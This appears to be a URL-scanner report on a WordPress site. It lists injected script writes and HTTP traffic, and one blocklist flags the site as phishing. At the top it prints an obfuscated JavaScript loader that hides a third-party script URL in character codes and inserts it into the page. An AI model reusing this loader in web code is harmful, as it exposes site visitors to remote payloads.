var psss = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psss.length; i++) {
    if (psss[i].id) {
        if (psss[i].id == "spectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "spectrepoint";
    s.async = true;
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 97, 100, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 108, 97, 115, 104, 46, 106, 115, 63, 118, 61, 48, 46, 57, 46, 55);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}

Executed Writes (4)
#1 JavaScript::Write (size: 527) - SHA256: 08d9b97d5ab63aef8ccf30ffd5da2396a4b7395103c16eaea8f83e7f5a3412f7
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=realtime_sentiment_index/index&liquidity=consumers&type=swfx&showPairs=true&showCurrencies=true&availableInstruments=l%3AEUR/USD%2CGBP/USD%2CUSD/CHF%2CUSD/JPY%2CAUD/USD%2CXAU/USD%2CE_SandP-500%2CE_Brent&availableCurrencies=AUD%2CCAD%2CCHF%2CGBP%2CJPY%2CNZD%2CUSD%2CEUR&headingColor=%23000000&dateColor=%23000000&bgColor=%23ffffff&width=940&height=535&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "940"
height = "535" > < /iframe>
#2 JavaScript::Write (size: 321) - SHA256: 7cb1da852b5b400eaf0618b8752fb3969dc8c7c473ec247cc8befebc13d84aec
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=intraday_movers_and_shakers/index&headingColor=%23000000&dateColor=%23000000&valueColor=%23000000&bgColor=%23ffffff&width=100%25&height=100%25&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "100%"
height = "100%" > < /iframe>
#3 JavaScript::Write (size: 889) - SHA256: 7b0f9f850f65a9377e975402f1633c6b4de053ac6c2303b5954801de31402a8c
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=fxmarkethours/index&showHeader=false&displayMainMenu=true&displayTimezoneChange=true&displayInstrumentChange=true&displaySpreadIndicator=true&displayVolumeIndicator=true&displayVolatilityIndicator=true&displayFollowButton=true&allowTimezoneChange=true&allowInstrumentChange=true&defaultTimezone=0&showIndicator=0&defaultFollowMode=false&worldMapColor=red&hoursBackground=%23444f5f&hoursActiveBackground=%237d92b0&hoursTextColor=%23ffffff&currentHourBGColor=%23f9fdff&dstHourColor=%230cf6ff&indicatorBarColor=%235090c6&graphPointsColor=%23ffffff&spreadTopGraphColor=%23208c1c&spreadBottomGraphColor=%23dc0e0e&volatilityGraphColor=%23146fba&availableInstruments=l%3A&instrument=EUR/USD&width=743&height=466&adv=popup&lang=en"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "743"
height = "466" > < /iframe>
#4 JavaScript::Write (size: 593) - SHA256: 6a81b067ab3dcd877043b20de7c77c4b7809a1991c92f92f52a8d4120227b743
< iframe src = "https://freeserv.dukascopy.com/2.0/?path=runboard/index&instruments=EUR/USD%2CUSD/JPY%2CGBP/USD%2CEUR/JPY%2CGBP/JPY%2CUSD/CAD%2CXAU/USD%2CAUD/USD%2CUSD/CHF%2CNZD/USD%2CE_Brent%2CE_SandP-500%2CE_DJE50XX%2CE_N225Jap&showDelta=true&showDeltaPercent=true&animationSpeed=100000&fontSize=12&fontFamily=Verdana%2C%20Geneva%2C%20sans-serif&instrumentColor=%23666666&priceColor=%23000000&delimeterColor=%230000FF&bgColor=%23FFFFFF&width=100%25&padding=30px&height=30&adv=popup"
border = "0"
marginWidth = "0"
marginHeight = "0"
frameBorder = "0"
scrolling = "no"
width = "100%"
height = "30" > < /iframe>


HTTP Transactions (122)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "12AF026999398F4976749E320667D43DA3F99B7A2E8254ACA7A410A964A106AA"
Last-Modified: Thu, 24 Nov 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9047
Expires: Sat, 26 Nov 2022 00:38:49 GMT
Date: Fri, 25 Nov 2022 22:08:02 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5133
Cache-Control: max-age=136124
Date: Fri, 25 Nov 2022 22:08:02 GMT
Etag: "63809972-1d7"
Expires: Sun, 27 Nov 2022 11:56:46 GMT
Last-Modified: Fri, 25 Nov 2022 10:31:14 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Content-Length, Alert, Backoff, Retry-After
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 25 Nov 2022 21:17:29 GMT
cache-control: public,max-age=3600
age: 3033
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    4d7e4eed097b9c4e5d509419f1cfc85a
Sha1:   290bb3d428a7c6330e2e3d73a952b16f820896c8
Sha256: 0dc9ca0f57af15adcd416035e92794711434e3d53a1feff21d8481d6d500986c
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3276
Expires: Fri, 25 Nov 2022 23:02:38 GMT
Date: Fri, 25 Nov 2022 22:08:02 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: JAP6zlqVClfUzqLa5Io8kI6/VS7LvrSmQHIhXrhNt7hv17DVJmLjIUCgmnDkEAeOLkzbtOLz1SI=
x-amz-request-id: P2DC0GHVPKHAQ7YC
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 25 Nov 2022 21:40:57 GMT
age: 1625
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET / HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         162.213.255.22
HTTP/1.1 301 Moved Permanently
content-type: text/html
                                        
keep-alive: timeout=5, max=100
content-length: 707
date: Fri, 25 Nov 2022 22:08:02 GMT
server: LiteSpeed
location: https://profitcrow.com/
x-turbo-charged-by: LiteSpeed


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with CRLF, LF line terminators
Size:   707
Md5:    1304294c0823ca486542ba408ed761e3
Sha1:   b2a70fb2d810ca13985882e6981f33998823e83e
Sha256: 3bbe72f3baa8ec61de17a1d767fca58704769684b7abe9161d0c4eaf4c8f0982

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:02 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: ETag, Content-Type, Content-Length, Last-Modified, Alert, Backoff, Pragma, Expires, Retry-After, Cache-Control
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 25 Nov 2022 21:11:11 GMT
cache-control: public,max-age=3600
age: 3412
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:03 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Fri, 25 Nov 2022 08:39:29 GMT
Expires: Fri, 02 Dec 2022 08:39:28 GMT
Etag: "78fdb48758198ffcdd12499e1cc3a1672a6fb12b"
Cache-Control: max-age=555684,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3640eefb50b-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2874
Cache-Control: max-age=128802
Date: Fri, 25 Nov 2022 22:08:03 GMT
Etag: "638085ab-1d7"
Expires: Sun, 27 Nov 2022 09:54:45 GMT
Last-Modified: Fri, 25 Nov 2022 09:06:51 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: E3baPpoRSH/2LpvXrkXuEg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         54.202.70.174
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: Z7R0CJP8ZGdLYps1lfa5ttPXX1I=

                                        
                                            GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-length: 27938
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "603e8adc-15d9d"
last-modified: Tue, 02 Mar 2021 18:58:36 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 1227808
expires: Wed, 15 Nov 2023 22:08:03 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uqf1R4LDI9tZmyLhekjxGz8ccV8Fn9APeLh6ORXUDZ2ydtMKreowCFzSZrFNdj2GzxrYzvsfzHFNYth%2Bd7Kfx2Cs9Fq5CuyiH9MWxcrmdT9QqXbaUyCnMNlNUFxSW1Q88TDPQmxC"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb368cd02b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   27938
Md5:    d900ca08873ee57d40616d39a44cc0aa
Sha1:   7ab3ac8b1504b7b914a6e94c979b8390bb492f6a
Sha256: 1eea479cc0abe04a0846f41031207f9511f12ffef017a6109d4efb6f5523465b
                                        
                                            GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-length: 15248
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "620188b3-3b90"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8130661
expires: Wed, 15 Nov 2023 22:08:03 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SdszxUUysYJ5%2BH6utl%2FHZAHzadQQWBjGzlVqIO6VYx9mqCjU82%2FjM6nlUt%2FNXajt8%2FafK7AZhBUDW3WSK7f1uO4VYUpjDCmbDXn%2BnJL70uTi3pwpEhzB0rfQqN8EK2pJXsCyG%2BRY"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb368ccfeb506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65317)
Size:   15248
Md5:    eaa2e9825d0aa4108e5c61a9058f5434
Sha1:   2c855186ced95e99325836c2af8b9cc2e823848a
Sha256: 65b91a9d675a0b22b90132b403e14db1fe82496a45c2a077ddecb2452e929077
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /jquery-3.6.0.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         69.16.175.42
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:03 GMT
content-encoding: gzip
content-length: 30875
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15d9d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1669414083.dop208.sk1.t,1669414083.cds258.sk1.hn,1669414083.cds210.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   30875
Md5:    899f0189aaf034bbba5340f724d91dfa
Sha1:   210ea9de03968edb9d839ba4a0ce2d48666a8ab8
Sha256: 949b6597c5ea907a7ef3c8ca6d5ffc73be2352f9df485b78704e5c4dabac5d0f
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5588
Cache-Control: max-age=162857
Date: Fri, 25 Nov 2022 22:08:03 GMT
Etag: "63810018-117"
Expires: Sun, 27 Nov 2022 19:22:20 GMT
Last-Modified: Fri, 25 Nov 2022 17:49:12 GMT
Server: ECS (amb/6B96)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /css?family=Lora%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.0.1 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 25 Nov 2022 22:08:04 GMT
date: Fri, 25 Nov 2022 22:08:04 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1183
Md5:    6baaf44396f6104d1047803659b4e0bb
Sha1:   73911ebd4e7547b6b75eb6b453d580d05a877901
Sha256: 26a9ff4fe98b51c919449c2916754b891dfab5ecfd6d80693d45571a343991ec
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 10946
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (43771)
Size:   10946
Md5:    d45207ee05c1f0c57dfa075e61405ccd
Sha1:   a8d35143a2d828a739ea0fdde75f97d33621e7ec
Sha256: a9a4adbbcee31ec277f1bdd573eef97dc4341f29f2db3b5685a02dfe4d2fe9bb
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Thu, 23 Dec 2021 11:30:13 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 848
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   848
Md5:    c962ba8e7d42ff9da18392b41dad5151
Sha1:   7b89bc5e6ad161df2e6d7f7fb3ad894aa04b827f
Sha256: 322a4949c5bdd82eb80c13bbbd407ce30a7ad226685c54270d246cb6960e524e
                                        
                                            GET /wp-content/plugins/video-popup/css/YouTubePopUp.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 942
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   942
Md5:    dab981875b77849c08e2ddb279e375ea
Sha1:   c98c3f91dc170e7ec53a83462a1186f7612d97b9
Sha256: 5d5a5845ac72af88574fc634dcc03a297efc05303e4e81f3039a6abb55f65b96
                                        
                                            GET /wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 259
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   259
Md5:    49736e2d926fb2846e2df8fc0a1b69f8
Sha1:   0c415addd3603df8843209de4fc448ef5c443761
Sha256: be091ce2d9948f24a59c9d1578557cd92e8180e2318dc0a21308ca180071f8d0
                                        
                                            GET /wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
